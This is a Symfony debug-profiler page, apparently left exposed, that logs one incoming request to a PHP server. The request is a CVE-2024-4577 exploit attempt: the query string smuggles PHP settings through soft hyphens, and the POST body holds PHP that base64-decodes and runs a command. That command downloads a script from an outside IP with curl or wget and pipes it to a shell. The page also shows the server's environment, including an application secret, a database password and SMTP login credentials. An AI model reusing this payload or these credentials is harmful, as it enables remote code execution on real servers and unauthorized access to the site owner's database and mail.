https://172.104.159.37/hello.world?p=hello.world&%ADd_allow_url_include%3D1_%ADd_auto_prepend_file%3Dphp%3A%2F%2Finput=

Method
GET
HTTP Status
404
IP
8.216.121.252
Profiled on
Token
9c0010

ErrorController

Request

GET Parameters

Key Value
p 
"hello.world"
�d_allow_url_include=1_�d_auto_prepend_file=php://input 
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA 
"=")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller 
"error_controller"
exception 
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#165
  -statusCode: 404
  -headers: []
  #message: "No route found for "POST /hello.world""
  #code: 0
  #file: "/var/www/html/grid/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 136
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#124 …}
  trace: {
    /var/www/html/grid/vendor/symfony/http-kernel/EventListener/RouterListener.php:136 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(GetResponseEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/html/grid/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:126 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(Event $event, $eventName, EventDispatcherInterface $dispatcher) …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);}
    /var/www/html/grid/vendor/symfony/event-dispatcher/EventDispatcher.php:264 {
      Symfony\Component\EventDispatcher\EventDispatcher->doDispatch($listeners, $eventName, Event $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/html/grid/vendor/symfony/event-dispatcher/EventDispatcher.php:239 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, $event) …
      › if ($event instanceof Event) {    $this->doDispatch($listeners, $eventName, $event);}
    /var/www/html/grid/vendor/symfony/event-dispatcher/EventDispatcher.php:73 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch($event) …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/html/grid/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:168 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch($event) …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/html/grid/vendor/symfony/http-kernel/HttpKernel.php:134 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MASTER_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/html/grid/vendor/symfony/http-kernel/HttpKernel.php:80 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, $type = HttpKernelInterface::MASTER_REQUEST, $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/www/html/grid/vendor/symfony/http-kernel/Kernel.php:201 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, $type = HttpKernelInterface::MASTER_REQUEST, $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/html/grid/public/index.php:25 {$request = Request::createFromGlobals();$response = $kernel->handle($request);$response->send();
    }
  }
}
logger 
null

Request Headers

Header Value
accept 
"*/*"
connection 
"keep-alive"
content-length 
"225"
content-type 
"application/x-www-form-urlencoded"
host 
"172.104.159.37:443"
upgrade-insecure-requests 
"1"
user-agent 
"Custom-AsyncHttpClient"
x-php-ob-level 
"1"

Request Content

Raw

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Sat, 21 Sep 2024 19:33:29 GMT"
x-debug-token 
"9c0010"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV 
"dev"
APP_SECRET 
"167aac464ff93a146ee252928c840d7b"
AWS_KEY 
"not-a-real-key"
AWS_SECRET 
"@@not-a-real-secret"
DATABASE_URL 
"mysql://grid_user:rxqCC2mLxPb4DEES@localhost:3306/grid_db?serverVersion=5.7"
MAILER_URL 
"smtp://mail.mpt-soft.com:2525?auth_mode=login&username=no-reply@mpt-soft.com&password=%3FgL%23oX%40%40e%21Bp"

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
CONTENT_LENGTH 
"225"
CONTENT_TYPE 
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT 
"/var/www/html/grid/public"
CONTEXT_PREFIX 
""
DOCUMENT_ROOT 
"/var/www/html/grid/public"
FCGI_ROLE 
"RESPONDER"
GATEWAY_INTERFACE 
"CGI/1.1"
HOME 
"/var/www"
HTTPS 
"on"
HTTP_ACCEPT 
"*/*"
HTTP_CONNECTION 
"keep-alive"
HTTP_HOST 
"172.104.159.37:443"
HTTP_UPGRADE_INSECURE_REQUESTS 
"1"
HTTP_USER_AGENT 
"Custom-AsyncHttpClient"
PATH 
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
PHP_SELF 
"/index.php"
QUERY_STRING 
"p=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_HTTPS 
"on"
REDIRECT_QUERY_STRING 
"p=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_SCRIPT_URI 
"https://172.104.159.37/hello.world"
REDIRECT_SCRIPT_URL 
"/hello.world"
REDIRECT_STATUS 
"200"
REDIRECT_URL 
"/hello.world"
REMOTE_ADDR 
"8.216.121.252"
REMOTE_PORT 
"44332"
REQUEST_METHOD 
"GET"
REQUEST_SCHEME 
"https"
REQUEST_TIME 
1726947209
REQUEST_TIME_FLOAT 
1726947209.6265
REQUEST_URI 
"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME 
"/var/www/html/grid/public/index.php"
SCRIPT_NAME 
"/index.php"
SCRIPT_URI 
"https://172.104.159.37/hello.world"
SCRIPT_URL 
"/hello.world"
SERVER_ADDR 
"172.104.159.37"
SERVER_ADMIN 
"[no address given]"
SERVER_NAME 
"172.104.159.37"
SERVER_PORT 
"443"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SIGNATURE 
"<address>Apache/2.4.29 (Ubuntu) Server at 172.104.159.37 Port 443</address>\n"
SERVER_SOFTWARE 
"Apache/2.4.29 (Ubuntu)"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_SECRET,AWS_KEY,AWS_SECRET,DATABASE_URL,MAILER_URL"
USER 
"www-data"
proxy-nokeepalive 
"1"

Parent Request

Return to parent request (token = caa667)

Key Value
(no data)